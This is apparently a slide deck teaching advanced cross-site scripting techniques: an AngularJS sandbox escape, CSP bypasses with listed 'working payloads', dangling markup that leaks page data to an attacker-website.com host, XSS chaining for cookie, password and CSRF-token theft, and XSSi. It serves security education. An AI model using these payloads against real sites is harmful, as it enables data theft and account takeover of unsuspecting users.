Ultimate XSS Advanced guide

BY UNCLE RAT Aka The XSS Rat

 Agenda
❏ AngularJS sandbox
❏ CSP
❏ Dangling markup injection
❏ Chaining XSS
❏ XSSi

2
��AngularJS sandbox
 Angularjs sandbox - what is it

❏ AngularJS is front-end templating engine

❏ AngularJS Sandbox is a technique that doesn't allow access to
dangerous objects
● i.e window
● i.e. document
● …

4
 Angularjs sandbox - what is it

❏ Bypassing sandbox used to be very hard

❏ In AngularJS 1.6 researchers found several ways
❏ Was eventually removed in 1.6
❏ Many legacy applications still run < 1.6

5
Angularjs sandbox - how does it work

❏ Parses an expression
❏ Rewrites the JS
❏ Checks if rewritten code s safe
● I.E. EnsureSafeObject()

6
 AngularJS sandbox – How can
we escape?
❏ We need to trick the parser into thinking our JS is safe
❏ Most famous escape uses modified charAt() function
❏ 'a'.constructor.prototype.charAt=[ ].join
● Overwrites the charAt() function using [ ].join
● Causes charAt() to return ALL characters to it
● Due to logic of isIndent() from angularJS it will compare what it thinks is
single char to multiple chars
● This will make isIndent() always return true

7
AngularJS sandbox – How can
we escape?
● Now that isIndent() always returns true, er can insert our JS code
● $eval('x=alert(1)')
● This is angularjs eval function
● Overwriting charAt only works when sandboxed code is executed
● The angularJS eval forces the sandbox code to run

isIndent= function(ch) {
return ('a' <= ch && ch <= 'z' ||'A' <= ch && ch <= 'Z' ||'_' === ch || ch === '$');
}
8
��CSP - What is it?
CSP - What is it?

❏ Content security policy

❏ Browser mechanism aimed to prevent XSS
❏ Works by only allowing content from certain sources
❏ Content-Security-Policy header

10
CSP - how it works

❏ Content-Security-Policy: script-src 'self'

● Only allows originating JS from own host address
❏ Content-Security-Policy: script-src
https://scripts.normal-website.com
● Allows executing of scripts from a certain source website

11
CSP - how it works

❏ Besides script sources there's Nonce

● Randomly generated number on server
● Value must be in HTML tag that loads script
❏ There’s also hashes
● Hash of the JS contents is being made

12
CSP - how do we bypass it?

❏ Do your own research as well, there's many techniques

❏ Policy injection
❏ Stealing the nonce with DOM clubbing
❏ Lack of object-src and default-src
❏ Wildcard
❏ ‘Unsafe-eval’
❏ ‘unsafe-inline’

13
CSP bypass-lack of object-src & default-src

❏ Content-Security-Policy: script-src
https://google.com ‘unsafe-inline’ https://*;
❏ child-src 'none';
❏ report-uri /Report-parsing-url;
❏ Working payload:
"/><script>alert(1);</script>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass

14
CSP bypass - unsafe eval

❏ Content-Security-Policy: script-src
https://google.com ‘unsafe-eval’ data:
https://*;
❏ child-src 'none';
❏ report-uri /Report-parsing-url;
❏ Working payload:
<scriptsrc="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass
15
CSP bypass - wildcard

❏ Content-Security-Policy: script-src ‘self’

https://google.com https: data *:
https://*;
❏ child-src 'none';
❏ report-uri /Report-parsing-url;
❏ Working payload:
"/>'><script src=https://attacker.com/evil.js></script>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass

16
CSP bypass-lack of object-src & default-src

❏ Content-Security-Policy: script-src ‘self’

❏ report -uri /Report-parsing-url:
❏ report-uri /Report-parsing-url;
❏ Working payloads:

❏ <object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwv
c2NyaXB0Pg=="> </object>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass

17
CSP bypass-lack of object-src & default-src

❏ ">'><object
type="application/x-shockwaveflash"
data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/as
sets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//'><param
name="AllowScriptAccess"value="always"> </object>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass

18
��Dangling markup injection
 Dangling markup injection-not xss

❏ Sometimes full XSS is not possible

❏ Dangling markup to the rescue!
❏ Technique to steal data that is on the page

20
 Dangling markup injection-not xss

❏ <input type="text" name="input" value="CONTROLLABLE DATA HERE

❏ We might be able to insert "> here
❏ We might not be able to perform full XSS due to filtering
❏ But what if we do "><img src='//attacker-website.com?
● Notice how tag has no closing '> (dangling markup)
● This will create an image tag
● Webpage will complete HTML until it finds ' in source code
● Image source will try to call upon our webserver with HTML code up until '
● Our webserver access logs will contain entry for call with data as get PARAM

21
��Chaining XSS
 Chaining xss

❏ XSS to steal cookies

● The victim might not be logged in.
● Many applications hide their cookies from JavaScript using the
HttpOnly flag.
● Sessions might be locked to additional factors like the user's IP
address.
● The session might time out before you're able to hijack it.

23
 Chaining xss

❏ XSS to steal passwords

● If user has autofill enabled.
● Password will be filled in.
● We can create password capture tool in JS.
● Only works if victim uses autofill.

24
 Chaining xss

❏ XSS to steal CSRF token

❏ Do ANYTHING you can do with JS
❏ Change an email address
● Request password reset > account takeover
❏ Delete all the users posts
❏ Change the default address and buy an item

25
��XSSi
 XSSi - what is it

❏ Sometimes JS contains sensitive information

❏ Usually JS can only be called when authenticated
❏ As a regular user we can't see that sensitve information
❏ So how do we get that sentive information?
❏ When using <script> tag, SOP doesn't apply
❏ Scripts have to be able to be cross-domain
❏ We can abuse this to include the JS file with secrets in it

27
 Xssi - how to abuse it

❏ If information is in global JS fill

● <script
src="https://www.vulnerabledomain.tld/script.js"></script>
● <script>alert(JSON.stringify(confidential_keys[0]));</script>
● First grab the script and the read the data with regex, using
keywords and json stringify,...

28
Xssi - how to abuse it

❏ Dynamic based JS
● Sometimes JS can be dynamically generated
● Might contain sensitive info when authenticated
● To know, request JS with and without cookies
● Authenticated request will look different
● If the extra JS code is in global variable we can use code
from our previous example
● Else we will need to overwrite the executed function

29
❏ And many more possibilities …

30